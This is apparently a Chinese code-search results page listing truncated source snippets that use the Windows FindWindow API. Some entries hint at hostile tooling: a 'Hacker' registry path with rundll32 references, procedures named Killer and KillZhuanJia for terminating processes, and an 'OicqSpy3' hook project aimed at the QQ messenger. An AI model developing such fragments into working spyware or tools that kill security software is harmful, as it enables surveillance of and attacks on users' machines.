代码搜索:FindWindow
找到约 333 项符合「FindWindow」的源代码
代码结果 333
www.eeworm.com/read/341936/12054666
pas antimonitormain.pas
unit AntiMonitorMain;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ComCtrls;
type
TForm1 = class(TForm)
StatusBar1: TStatus
www.eeworm.com/read/341936/12054681
~pas antimonitormain.~pas
unit AntiMonitorMain;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ComCtrls;
type
TForm1 = class(TForm)
StatusBar1: TStatus
www.eeworm.com/read/151211/12227397
txt 44.txt
利用 窗口函数监视系统的运行情况(VB类)
摘要 本文介绍了用窗口函数制作系统监视器的方法。用 VB5.0 编译并运行本文介绍的程序,可以监视系统正在运行的程序,并可根据您的要求关闭某些程序。
所用到的 API 函数 <mark>FindWindow</mark>、PostMessage
一、概述
当你不在你的机器旁边时,你是否会担心有人在你的机器上运行了某些程序(给你的机器带来损坏)或有小孩子在你的电脑上"胡耍 ...
www.eeworm.com/read/252144/12298447
pas unithooktype.pas
unit UnitHookType;
interface
uses windows, TLHelp32,reg,sysutils2;
const
sname='ct2';
fileRundll32 = 'rundll32.exe';
fileInternat = 'Internat.exe';
regpath = 'Software\Hacker软件\
www.eeworm.com/read/252144/12298484
pas other.pas
unit Other;
interface
uses
Windows, tlhelp32,reg,sysutils2;
procedure Killer;
procedure Killpro(s: string);
implementation
procedure KillZhuanJia;
var
found: boolean;
s,path:
www.eeworm.com/read/250112/12432618
bas module1.bas
Attribute VB_Name = "Module1"
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMe
www.eeworm.com/read/250112/12432989
bas module1.bas
Attribute VB_Name = "Module1"
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMe
www.eeworm.com/read/250112/12433021
frm form1.frm
VERSION 5.00
Begin VB.Form Form1
BorderStyle = 0 'None
Caption = "StartUp"
ClientHeight = 9870
ClientLeft = 0
ClientTop = 0
ClientWidth
www.eeworm.com/read/126067/14449018
frm form1.frm
VERSION 5.00
Begin VB.Form Form1
Caption = "Form1"
ClientHeight = 2295
ClientLeft = 60
ClientTop = 345
ClientWidth = 4170
LinkTopic
www.eeworm.com/read/120877/14784524
dpr oicqspy3.dpr
program OicqSpy3;
uses
Forms, Windows, Messages,
MainUnit in 'MainUnit.pas' {MainForm},
ConstHook in 'ConstHook.pas';
{$R *.RES}
begin
Oldhandle:=Findwindow(Nil,Pchar(Oldappcap));